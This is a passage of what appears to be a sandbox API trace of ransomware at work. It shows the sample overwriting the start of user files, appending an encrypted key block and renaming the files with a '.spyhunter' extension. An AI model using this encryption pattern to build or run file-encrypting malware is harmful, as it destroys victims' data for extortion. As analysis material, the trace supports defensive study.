lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f02c*=0x2800, lpOverlapped=0x0) returned 1 [0140.678] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.678] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f02c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f02c*=0x2800, lpOverlapped=0x0) returned 1 [0140.679] GetProcessHeap () returned 0x2c0000 [0140.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.679] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.679] WriteFile (in: hFile=0xf0, lpBuffer=0x270f06c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f02c, lpOverlapped=0x0 | out: lpBuffer=0x270f06c*, lpNumberOfBytesWritten=0x270f02c*=0x4, lpOverlapped=0x0) returned 1 [0140.679] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f02c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f02c*=0x30, lpOverlapped=0x0) returned 1 [0140.679] CloseHandle (hObject=0xf0) returned 1 [0140.699] GetProcessHeap () returned 0x2c0000 [0140.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.699] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MCXTTK4kzfHa12KoL1P.wav.spyhunter") returned 83 [0140.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MCXTTK4kzfHa12KoL1P.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mcxttk4kzfha12kol1p.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MCXTTK4kzfHa12KoL1P.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mcxttk4kzfha12kol1p.wav.spyhunter")) returned 1 [0140.701] GetProcessHeap () returned 0x2c0000 [0140.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.701] GetProcessHeap () returned 0x2c0000 [0140.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.701] GetProcessHeap () returned 0x2c0000 [0140.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5118 | out: hHeap=0x2c0000) returned 1 [0140.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f058 | out: pbBuffer=0x270f058) returned 1 [0140.833] GetProcessHeap () returned 0x2c0000 [0140.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.834] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f050*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f050*=0x30) returned 1 [0140.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.834] GetProcessHeap () returned 0x2c0000 [0140.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.834] GetProcessHeap () returned 0x2c0000 [0140.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46828 | out: hHeap=0x2c0000) returned 1 [0140.834] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f058 | out: pbBuffer=0x270f058) returned 1 [0140.834] GetProcessHeap () returned 0x2c0000 [0140.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.834] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f050*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f050*=0x30) returned 1 [0140.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.834] GetProcessHeap () returned 0x2c0000 [0140.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.835] GetProcessHeap () returned 0x2c0000 [0140.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46728 | out: hHeap=0x2c0000) returned 1 [0140.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f050 | out: pbBuffer=0x270f050) returned 1 [0140.836] GetProcessHeap () returned 0x2c0000 [0140.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f048*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f048*=0x30) returned 1 [0140.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.836] GetProcessHeap () returned 0x2c0000 [0140.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.836] GetProcessHeap () returned 0x2c0000 [0140.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46928 | out: hHeap=0x2c0000) returned 1 [0140.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f048 | out: pbBuffer=0x270f048) returned 1 [0140.836] GetProcessHeap () returned 0x2c0000 [0140.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f040*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f040*=0x30) returned 1 [0140.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.837] GetProcessHeap () returned 0x2c0000 [0140.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.837] GetProcessHeap () returned 0x2c0000 [0140.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46628 | out: hHeap=0x2c0000) returned 1 [0140.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f040 | out: pbBuffer=0x270f040) returned 1 [0140.838] GetProcessHeap () returned 0x2c0000 [0140.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f038*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f038*=0x30) returned 1 [0140.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.838] GetProcessHeap () returned 0x2c0000 [0140.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.838] GetProcessHeap () returned 0x2c0000 [0140.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68010 | out: hHeap=0x2c0000) returned 1 [0140.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f040 | out: pbBuffer=0x270f040) returned 1 [0140.838] GetProcessHeap () returned 0x2c0000 [0140.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f038*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f038*=0x30) returned 1 [0140.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.839] GetProcessHeap () returned 0x2c0000 [0140.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.839] GetProcessHeap () returned 0x2c0000 [0140.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f686a0 | out: hHeap=0x2c0000) returned 1 [0140.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f038 | out: pbBuffer=0x270f038) returned 1 [0140.839] GetProcessHeap () returned 0x2c0000 [0140.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.839] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f030*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f030*=0x30) returned 1 [0140.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.839] GetProcessHeap () returned 0x2c0000 [0140.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.839] GetProcessHeap () returned 0x2c0000 [0140.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a1a8 | out: hHeap=0x2c0000) returned 1 [0140.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f038 | out: pbBuffer=0x270f038) returned 1 [0140.839] GetProcessHeap () returned 0x2c0000 [0140.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.839] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f030*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f030*=0x30) returned 1 [0140.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.839] GetProcessHeap () returned 0x2c0000 [0140.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.840] GetProcessHeap () returned 0x2c0000 [0140.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63c78 | out: hHeap=0x2c0000) returned 1 [0140.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f030 | out: pbBuffer=0x270f030) returned 1 [0140.840] GetProcessHeap () returned 0x2c0000 [0140.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f028*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f028*=0x30) returned 1 [0140.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.840] GetProcessHeap () returned 0x2c0000 [0140.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.840] GetProcessHeap () returned 0x2c0000 [0140.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63b88 | out: hHeap=0x2c0000) returned 1 [0140.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f030 | out: pbBuffer=0x270f030) returned 1 [0140.840] GetProcessHeap () returned 0x2c0000 [0140.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f028*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f028*=0x30) returned 1 [0140.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.840] GetProcessHeap () returned 0x2c0000 [0140.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.841] GetProcessHeap () returned 0x2c0000 [0140.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63a98 | out: hHeap=0x2c0000) returned 1 [0140.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f020 | out: pbBuffer=0x270f020) returned 1 [0140.843] GetProcessHeap () returned 0x2c0000 [0140.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f018*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f018*=0x30) returned 1 [0140.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.923] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0140.923] StrStrW (lpFirst="ContentStore.xml", lpSrch=".txt") returned 0x0 [0140.923] GetProcessHeap () returned 0x2c0000 [0140.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.923] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270efdc*=0xa8, lpOverlapped=0x0) returned 1 [0140.924] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffff58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.924] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x270efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270efdc*=0xa8, lpOverlapped=0x0) returned 1 [0140.924] GetProcessHeap () returned 0x2c0000 [0140.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.924] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.924] WriteFile (in: hFile=0xf0, lpBuffer=0x270f01c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270efdc, lpOverlapped=0x0 | out: lpBuffer=0x270f01c*, lpNumberOfBytesWritten=0x270efdc*=0x4, lpOverlapped=0x0) returned 1 [0140.924] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270efdc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270efdc*=0x30, lpOverlapped=0x0) returned 1 [0140.925] CloseHandle (hObject=0xf0) returned 1 [0140.925] GetProcessHeap () returned 0x2c0000 [0140.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.925] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.spyhunter") returned 112 [0140.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.spyhunter")) returned 1 [0140.926] GetProcessHeap () returned 0x2c0000 [0140.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.926] GetProcessHeap () returned 0x2c0000 [0140.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.926] GetProcessHeap () returned 0x2c0000 [0140.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67de0 | out: hHeap=0x2c0000) returned 1 [0141.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f000 | out: pbBuffer=0x270f000) returned 1 [0141.013] GetProcessHeap () returned 0x2c0000 [0141.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270eff8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270eff8*=0x30) returned 1 [0141.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0141.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0141.014] StrStrW (lpFirst="glob.settings.js", lpSrch=".txt") returned 0x0 [0141.014] GetProcessHeap () returned 0x2c0000 [0141.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.014] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270efbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270efbc*=0xa, lpOverlapped=0x0) returned 1 [0141.015] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffff6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.015] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x270efbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270efbc*=0xa, lpOverlapped=0x0) returned 1 [0141.015] GetProcessHeap () returned 0x2c0000 [0141.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.015] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.015] WriteFile (in: hFile=0xb4, lpBuffer=0x270effc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270efbc, lpOverlapped=0x0 | out: lpBuffer=0x270effc*, lpNumberOfBytesWritten=0x270efbc*=0x4, lpOverlapped=0x0) returned 1 [0141.015] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270efbc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270efbc*=0x30, lpOverlapped=0x0) returned 1 [0141.015] CloseHandle (hObject=0xb4) returned 1 [0141.015] GetProcessHeap () returned 0x2c0000 [0141.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.016] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.spyhunter") returned 107 [0141.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.spyhunter")) returned 1 [0141.087] GetProcessHeap () returned 0x2c0000 [0141.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.087] GetProcessHeap () returned 0x2c0000 [0141.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.087] GetProcessHeap () returned 0x2c0000 [0141.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67750 | out: hHeap=0x2c0000) returned 1 [0141.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eff8 | out: pbBuffer=0x270eff8) returned 1 [0141.150] GetProcessHeap () returned 0x2c0000 [0141.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.150] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270eff0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270eff0*=0x30) returned 1 [0141.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\2OxY2oo.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\2oxy2oo.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\2OxY2oo.odt") returned 71 [0141.151] StrStrW (lpFirst="2OxY2oo.odt", lpSrch=".txt") returned 0x0 [0141.151] GetProcessHeap () returned 0x2c0000 [0141.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.151] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270efb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270efb4*=0x2800, lpOverlapped=0x0) returned 1 [0141.152] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.152] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270efb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270efb4*=0x2800, lpOverlapped=0x0) returned 1 [0141.152] GetProcessHeap () returned 0x2c0000 [0141.152] HeapFree (in: hHeap=0x2c0000, 